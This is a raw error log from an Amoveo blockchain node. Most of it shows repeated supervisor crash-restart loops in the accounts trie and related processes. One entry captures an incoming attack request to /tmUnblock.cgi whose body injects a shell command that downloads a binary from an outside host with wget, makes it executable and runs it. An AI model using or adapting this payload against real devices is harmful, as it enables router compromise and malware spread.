2019-07-17 09:15:35.341 [error] <0.940.0> Supervisor amoveo_sup had child recent_blocks started with recent_blocks:start_link() at <0.28702.1> exit with reason {{{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}},...} in context child_terminated
2019-07-17 09:15:35.341 [debug] <0.941.0> Supervisor {global,accounts} started trie:start_link({cfg,32,106,accounts,3,32,ram,undefined}) at pid <0.28709.1>
2019-07-17 09:15:35.341 [debug] <0.940.0> Supervisor amoveo_sup started recent_blocks:start_link() at pid <0.28711.1>
2019-07-17 09:15:35.499 [error] <0.28709.1>@stem:deserialize:129 gen_server accounts_main terminated with reason: no match of right hand value empty in stem:deserialize/7 line 129
2019-07-17 09:15:35.499 [error] <0.28709.1>@stem:deserialize:129 CRASH REPORT Process <0.28709.1> with 0 neighbours crashed with reason: no match of right hand value empty in stem:deserialize/7 line 129
2019-07-17 09:15:35.499 [error] <0.941.0>@stem:deserialize:129 Supervisor {global,accounts} had child accounts_main started with trie:start_link({cfg,32,106,accounts,3,32,ram,undefined}) at <0.28709.1> exit with reason no match of right hand value empty in stem:deserialize/7 line 129 in context child_terminated
2019-07-17 09:15:35.501 [error] <0.28710.1> gen_server tree_data terminated with reason: {{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}} in gen_server:call/2 line 206
2019-07-17 09:15:35.501 [error] <0.28710.1> CRASH REPORT Process tree_data with 0 neighbours exited with reason: {{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}} in gen_server:call/2 line 206
2019-07-17 09:15:35.502 [error] <0.940.0> Supervisor amoveo_sup had child tree_data started with tree_data:start_link() at <0.28710.1> exit with reason {{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}} in context child_terminated
2019-07-17 09:15:35.502 [debug] <0.940.0> Supervisor amoveo_sup started tree_data:start_link() at pid <0.28719.1>
2019-07-17 09:15:35.505 [error] <0.28711.1> gen_server recent_blocks terminated with reason: {{{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}},...} in gen_server:call/2 line 206
2019-07-17 09:15:35.505 [error] <0.28711.1> CRASH REPORT Process recent_blocks with 0 neighbours exited with reason: {{{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}},...} in gen_server:call/2 line 206
2019-07-17 09:15:35.505 [error] <0.940.0> Supervisor amoveo_sup had child recent_blocks started with recent_blocks:start_link() at <0.28711.1> exit with reason {{{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}},...} in context child_terminated
2019-07-17 09:15:35.506 [debug] <0.941.0> Supervisor {global,accounts} started trie:start_link({cfg,32,106,accounts,3,32,ram,undefined}) at pid <0.28718.1>
2019-07-17 09:15:35.506 [debug] <0.940.0> Supervisor amoveo_sup started recent_blocks:start_link() at pid <0.28720.1>
2019-07-17 09:15:35.643 [error] <0.28718.1>@stem:deserialize:129 gen_server accounts_main terminated with reason: no match of right hand value empty in stem:deserialize/7 line 129
2019-07-17 09:15:35.643 [error] <0.28718.1>@stem:deserialize:129 CRASH REPORT Process <0.28718.1> with 0 neighbours crashed with reason: no match of right hand value empty in stem:deserialize/7 line 129
2019-07-17 09:15:35.644 [error] <0.941.0>@stem:deserialize:129 Supervisor {global,accounts} had child accounts_main started with trie:start_link({cfg,32,106,accounts,3,32,ram,undefined}) at <0.28718.1> exit with reason no match of right hand value empty in stem:deserialize/7 line 129 in context child_terminated
2019-07-17 09:15:35.644 [error] <0.941.0> Supervisor {global,accounts} had child accounts_main started with trie:start_link({cfg,32,106,accounts,3,32,ram,undefined}) at <0.28718.1> exit with reason reached_max_restart_intensity in context shutdown
2019-07-17 09:15:35.645 [error] <0.28719.1> gen_server tree_data terminated with reason: {{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}} in gen_server:call/2 line 206
2019-07-17 09:15:35.645 [error] <0.28719.1> CRASH REPORT Process tree_data with 0 neighbours exited with reason: {{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}} in gen_server:call/2 line 206
2019-07-17 09:15:35.646 [error] <0.940.0> Supervisor amoveo_sup had child tree_data started with tree_data:start_link() at <0.28719.1> exit with reason {{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}} in context child_terminated
2019-07-17 09:15:35.646 [debug] <0.940.0> Supervisor amoveo_sup started tree_data:start_link() at pid <0.28728.1>
2019-07-17 09:15:35.649 [error] <0.28720.1> gen_server recent_blocks terminated with reason: {{{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}},...} in gen_server:call/2 line 206
2019-07-17 09:15:35.649 [error] <0.28720.1> CRASH REPORT Process recent_blocks with 0 neighbours exited with reason: {{{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}},...} in gen_server:call/2 line 206
2019-07-17 09:15:35.650 [error] <0.940.0> Supervisor amoveo_sup had child recent_blocks started with recent_blocks:start_link() at <0.28720.1> exit with reason {{{{badmatch,empty},[{stem,deserialize,7,[{file,"/root/amoveo/_build/default/lib/trie/src/stem.erl"},{line,129}]},{prune,garbage,3,[{file,"/root/amoveo/_build/default/lib/trie/src/prune.erl"},{line,14}]},{trie,handle_call,3,[{file,"/root/amoveo/_build/default/lib/trie/src/trie.erl"},{line,26}]},{gen_server,try_handle_call,4,[{file,"gen_server.erl"},{line,636}]},{gen_server,handle_msg,6,[{file,"gen_server.erl"},{line,665}]},{proc_lib,init_p_do_apply,3,[{file,"proc_lib.erl"},{line,247}]}]},{gen_server,...}},...} in context child_terminated
2019-07-17 09:15:35.650 [debug] <0.940.0> Supervisor amoveo_sup started recent_blocks:start_link() at pid <0.28729.1>
2019-07-17 09:15:35.667 [error] <0.28728.1>@gen_server:call gen_server tree_data terminated with reason: no such process or port in call to gen_server:call({global,accounts_main}, cfg) in gen_server:call/2 line 206
2019-07-17 09:15:35.668 [error] <0.28728.1>@gen_server:call CRASH REPORT Process tree_data with 0 neighbours exited with reason: no such process or port in call to gen_server:call({global,accounts_main}, cfg) in gen_server:call/2 line 206
2019-07-17 09:15:35.668 [error] <0.940.0>@gen_server:call Supervisor amoveo_sup had child tree_data started with tree_data:start_link() at <0.28728.1> exit with reason no such process or port in call to gen_server:call({global,accounts_main}, cfg) in context child_terminated
2019-07-17 09:15:35.668 [debug] <0.940.0> Supervisor amoveo_sup started tree_data:start_link() at pid <0.28733.1>
2019-07-17 09:15:35.670 [error] <0.1044.0> gen_server block_absorber terminated with reason: {{noproc,{gen_server,call,[{global,accounts_main},cfg]}},{gen_server,call,[tree_data,{update,{trees2,457060,83,1,117,103,1,2},{dict,2,16,16,8,80,48,{[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[]},{{[],[],[],[],[],[[{accounts,<<4,189,18,206,25,5,24,85,181,145,52,221,156,239,44,26,124,15,19,53,47,199,101,54,159,33,2,193,105,148,36,244,97,47,22,207,60,175,158,167,199,152,51,25,83,197,83,191,194,116,18,229,105,172,24,130,156,172,243,251,252,92,53,89,87>>}|{<<0,215,39,76,215,45,0,0,0,4,189,...>>,...}]],...}}}}]}} in gen_server:call/2 line 206
2019-07-17 09:15:35.670 [error] <0.1044.0> CRASH REPORT Process block_absorber with 0 neighbours exited with reason: {{noproc,{gen_server,call,[{global,accounts_main},cfg]}},{gen_server,call,[tree_data,{update,{trees2,457060,83,1,117,103,1,2},{dict,2,16,16,8,80,48,{[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[]},{{[],[],[],[],[],[[{accounts,<<4,189,18,206,25,5,24,85,181,145,52,221,156,239,44,26,124,15,19,53,47,199,101,54,159,33,2,193,105,148,36,244,97,47,22,207,60,175,158,167,199,152,51,25,83,197,83,191,194,116,18,229,105,172,24,130,156,172,243,251,252,92,53,89,87>>}|{<<0,215,39,76,215,45,0,0,0,4,189,...>>,...}]],...}}}}]}} in gen_server:call/2 line 206
2019-07-17 09:15:35.672 [error] <0.940.0> Supervisor amoveo_sup had child block_absorber started with block_absorber:start_link() at <0.1044.0> exit with reason {{noproc,{gen_server,call,[{global,accounts_main},cfg]}},{gen_server,call,[tree_data,{update,{trees2,457060,83,1,117,103,1,2},{dict,2,16,16,8,80,48,{[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[]},{{[],[],[],[],[],[[{accounts,<<4,189,18,206,25,5,24,85,181,145,52,221,156,239,44,26,124,15,19,53,47,199,101,54,159,33,2,193,105,148,36,244,97,47,22,207,60,175,158,167,199,152,51,25,83,197,83,191,194,116,18,229,105,172,24,130,156,172,243,251,252,92,53,89,87>>}|{<<0,215,39,76,215,45,0,0,0,4,189,...>>,...}]],...}}}}]}} in context child_terminated
2019-07-17 09:15:35.672 [debug] <0.940.0> Supervisor amoveo_sup started block_absorber:start_link() at pid <0.28734.1>
2019-07-17 09:15:35.677 [error] <0.685.0> Lager event handler error_logger_lager_h exited with reason {'EXIT',{{case_clause,[block_organizer,{add,49157,167,<<120,94,236,189,5,92,149,203,246,63,188,105,145,20,69,186,187,27,233,144,144,148,144,14,233,150,78,9,5,81,74,186,91,186,5,65,81,64,82,58,149,238,70,64,16,69,186,121,241,217,222,251,243,127,207,185,186,207,171,199,123,207,185,251,241,179,213,207,126,190,123,205,204,154,53,107,214,204,172,89,203,247,22,8,4,202,53,199,54,6,33,24,222,178,53,178,50,4,129,234,17,172,207,190,35,109,148,77,164,229,239,154,105,105,173,147,183,160,90,20,148,136,...>>},...]},...}}
2019-07-17 09:15:35.699 [debug] <0.685.0>@lager_handler_watcher:119 Lager installed handler error_logger_lager_h into error_logger
2019-07-17 09:15:35.751 [error] <0.940.0> Supervisor amoveo_sup had child accounts_sup started with trie_sup:start_link(32, 106, accounts, 3000000, 3, 32, ram, "../../../../db/") at <0.941.0> exit with reason shutdown in context child_terminated
2019-07-17 09:15:35.807 [debug] <0.28742.1> Supervisor {global,accounts_leafsup} started dump:start_link(141, accounts_leaf, ram, "../../../../db/data/accounts_leaf.db") at pid <0.28743.1>
2019-07-17 09:15:35.807 [debug] <0.28741.1> Supervisor {global,accounts} started dump_sup:start_link(accounts_leaf, 141, 3000000, ram, "../../../../db/") at pid <0.28742.1>
2019-07-17 09:15:35.809 [error] <0.28733.1>@gen_server:call gen_server tree_data terminated with reason: no such process or port in call to gen_server:call({global,accounts_main}, {garbage,456033,456046}) in gen_server:call/2 line 206
2019-07-17 09:15:35.809 [error] <0.28733.1>@gen_server:call CRASH REPORT Process tree_data with 0 neighbours exited with reason: no such process or port in call to gen_server:call({global,accounts_main}, {garbage,456033,456046}) in gen_server:call/2 line 206
2019-07-17 09:15:35.812 [error] <0.28729.1> gen_server recent_blocks terminated with reason: {{noproc,{gen_server,call,[{global,accounts_main},{garbage,456033,456046}]}},{gen_server,call,[tree_data,{garbage,{block,49140,<<164,208,52,119,36,42,225,58,117,76,13,243,164,234,172,253,47,167,208,154,174,38,240,65,92,150,239,54,52,101,149,183>>,<<39,92,144,237,47,7,155,235,194,130,37,199,174,89,181,231,117,181,78,155,167,200,78,97,223,125,96,170,252,205,58,192>>,279864100,14092,5982,3,4402464159261553532283314509222,{trees2,456033,83,1,117,103,1,2},[{coinbase,<<4,47,52,160,111,196,1,122,...>>,...},...],...},...}]}} in gen_server:call/2 line 206
2019-07-17 09:15:35.812 [error] <0.28729.1> CRASH REPORT Process recent_blocks with 0 neighbours exited with reason: {{noproc,{gen_server,call,[{global,accounts_main},{garbage,456033,456046}]}},{gen_server,call,[tree_data,{garbage,{block,49140,<<164,208,52,119,36,42,225,58,117,76,13,243,164,234,172,253,47,167,208,154,174,38,240,65,92,150,239,54,52,101,149,183>>,<<39,92,144,237,47,7,155,235,194,130,37,199,174,89,181,231,117,181,78,155,167,200,78,97,223,125,96,170,252,205,58,192>>,279864100,14092,5982,3,4402464159261553532283314509222,{trees2,456033,83,1,117,103,1,2},[{coinbase,<<4,47,52,160,111,196,1,122,...>>,...},...],...},...}]}} in gen_server:call/2 line 206
2019-07-17 09:15:35.825 [debug] <0.28747.1> Supervisor {global,accounts_stemsup} started dump:start_link(1028, accounts_stem, ram, "../../../../db/data/accounts_stem.db") at pid <0.28748.1>
2019-07-17 09:15:35.825 [debug] <0.28741.1> Supervisor {global,accounts} started dump_sup:start_link(accounts_stem, 1028, 3000000, ram, "../../../../db/") at pid <0.28747.1>
2019-07-17 09:15:35.826 [debug] <0.28741.1> Supervisor {global,accounts} started trie:start_link({cfg,32,106,accounts,3,32,ram,undefined}) at pid <0.28751.1>
2019-07-17 09:15:35.826 [debug] <0.940.0> Supervisor amoveo_sup started trie_sup:start_link(32, 106, accounts, 3000000, 3, 32, ram, "../../../../db/") at pid <0.28741.1>
2019-07-17 09:15:35.827 [error] <0.940.0>@gen_server:call Supervisor amoveo_sup had child tree_data started with tree_data:start_link() at <0.28733.1> exit with reason no such process or port in call to gen_server:call({global,accounts_main}, {garbage,456033,456046}) in context child_terminated
2019-07-17 09:15:35.827 [debug] <0.940.0> Supervisor amoveo_sup started tree_data:start_link() at pid <0.28752.1>
2019-07-17 09:15:35.828 [error] <0.940.0> Supervisor amoveo_sup had child recent_blocks started with recent_blocks:start_link() at <0.28729.1> exit with reason {{noproc,{gen_server,call,[{global,accounts_main},{garbage,456033,456046}]}},{gen_server,call,[tree_data,{garbage,{block,49140,<<164,208,52,119,36,42,225,58,117,76,13,243,164,234,172,253,47,167,208,154,174,38,240,65,92,150,239,54,52,101,149,183>>,<<39,92,144,237,47,7,155,235,194,130,37,199,174,89,181,231,117,181,78,155,167,200,78,97,223,125,96,170,252,205,58,192>>,279864100,14092,5982,3,4402464159261553532283314509222,{trees2,456033,83,1,117,103,1,2},[{coinbase,<<4,47,52,160,111,196,1,122,...>>,...},...],...},...}]}} in context child_terminated
2019-07-17 09:15:35.828 [debug] <0.940.0> Supervisor amoveo_sup started recent_blocks:start_link() at pid <0.28753.1>
2019-07-17 09:21:56.522 [error] emulator Error in process <0.3850.2> on node amoveo_core_prod@testnode with exit value:
{[{reason,{badmatch,false}},{mfa,{ext_file_handler,handle,2}},{stacktrace,[{ext_file_handler,handle,2,[{file,"/root/amoveo/_build/prod/lib/amoveo_http/src/ext_file_handler.erl"},{line,19}]},{cowboy_handler,handler_handle,4,[{file,"/root/amoveo/_build/default/lib/cowboy/src/cowboy_handler.erl"},{line,111}]},{cowboy_protocol,execute,4,[{file,"/root/amoveo/_build/default/lib/cowboy/src/cowboy_protocol.erl"},{line,442}]}]},{req,[{socket,#Port<0.2307>},{transport,ranch_tcp},{connection,keepalive},{pid,<0.3850.2>},{method,<<"POST">>},{version,'HTTP/1.1'},{peer,{{217,6,242,210},34106}},{host,<<"127.0.0.1">>},{host_info,undefined},{port,80},{path,<<"/tmUnblock.cgi">>},{path_info,undefined},{qs,<<>>},{qs_vals,undefined},{bindings,[{file,<<"tmUnblock.cgi">>}]},{headers,[{<<"host">>,<<"127.0.0.1">>},{<<"connection">>,<<"keep-alive">>},{<<"accept-encoding">>,<<"gzip, deflate">>},{<<"accept">>,<<"*/*">>},{<<"user-agent">>,<<"Liquor 1.0">>},{<<"content-length">>,<<"312">>},{<<"content-type">>,<<"application/x-www-form-urlencoded">>}]},{p_headers,[{<<"connection">>,[<<"keep-alive">>]}]},{cookies,undefined},{meta,[]},{body_state,waiting},{buffer,<<"ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+loli%3B+wget+http%3A%2F%2Fardp.hldns.ru%2Floligang.mpsl%3B+chmod+777+loligang.mpsl%3B+.%2Floligang.mpsl+loligang.mpsl.linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1">>},{multipart,undefined},{resp_compress,false},{resp_state,waiting},{resp_headers,[]},{resp_body,<<>>},{onresponse,undefined}]},{state,[]}],[{cowboy_handler,handler_handle,4,[{file,"/root/amoveo/_build/default/lib/cowboy/src/cowboy_handler.erl"},{line,119}]},{cowboy_protocol,execute,4,[{file,"/root/amoveo/_build/default/lib/cowboy/src/cowboy_protocol.erl"},{line,442}]}]}
2019-07-17 09:21:56.522 [error] <0.3850.2>@ext_file_handler:handle:19 Ranch listener http terminated in ext_file_handler:handle/2 with reason: no match of right hand value false in ext_file_handler:handle/2 line 19
2019-07-17 09:25:11.072 [error] emulator Error in process <0.7871.2> on node amoveo_core_prod@testnode with exit value:
{{nocatch,[{reason,{error,{1,truncated_json}}},{mfa,{ext_handler,handle,2}},{stacktrace,[{jiffy,decode,2,[{file,"/root/amoveo/_build/default/lib/jiffy/src/jiffy.erl"},{line,68}]},{packer,unpack,1,[{file,"/root/amoveo/_build/default/lib/encrypter/src/packer.erl"},{line,13}]},{ext_handler,handle,2,[{file,"/root/amoveo/_build/prod/lib/amoveo_http/src/ext_handler.erl"},{line,20}]},{cowboy_handler,handler_handle,4,[{file,"/root/amoveo/_build/default/lib/cowboy/src/cowboy_handler.erl"},{line,111}]},{cowboy_protocol,execute,4,[{file,"/root/amoveo/_build/default/lib/cowboy/src/cowboy_protocol.erl"},{line,442}]}]},{req,[{socket,#Port<0.2450>},{transport,ranch_tcp},{connection,keepalive},{pid,<0.7871.2>},{method,<<"GET">>},{version,'HTTP/1.1'},{peer,{{201,76,112,135},45827}},{host,<<"116.203.36.161">>},{host_info,undefined},{port,8080},{path,<<"/">>},{path_info,undefined},{qs,<<>>},{qs_vals,undefined},{bindings,[]},{headers,[{<<"host">>,<<"116.203.36.161:8080">>},{<<"user-agent">>,<<"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36">>},{<<"content-length">>,<<"0">>}]},{p_headers,[]},{cookies,undefined},{meta,[]},{body_state,waiting},{buffer,<<>>},{multipart,undefined},{resp_compress,false},{resp_state,waiting},{resp_headers,[]},{resp_body,<<>>},{onresponse,undefined}]},{state,no_state}]},[{cowboy_handler,handler_handle,4,[{file,"/root/amoveo/_build/default/lib/cowboy/src/cowboy_handler.erl"},{line,119}]},{cowboy_protocol,execute,4,[{file,"/root/amoveo/_build/default/lib/cowboy/src/cowboy_protocol.erl"},{line,442}]}]}
2019-07-17 09:25:11.073 [error] <0.7871.2> Ranch listener http terminated with reason: {nocatch,[{reason,{error,{1,truncated_json}}},{mfa,{ext_handler,handle,2}},{stacktrace,[{jiffy,decode,2,[{file,"/root/amoveo/_build/default/lib/jiffy/src/jiffy.erl"},{line,68}]},{packer,unpack,1,[{file,"/root/amoveo/_build/default/lib/encrypter/src/packer.erl"},{line,13}]},{ext_handler,handle,2,[{file,"/root/amoveo/_build/prod/lib/amoveo_http/src/ext_handler.erl"},{line,20}]},{cowboy_handler,handler_handle,4,[{file,"/root/amoveo/_build/default/lib/cowboy/src/cowboy_handler.erl"},{line,111}]},...]},...]} in cowboy_handler:handler_handle/4 line 119
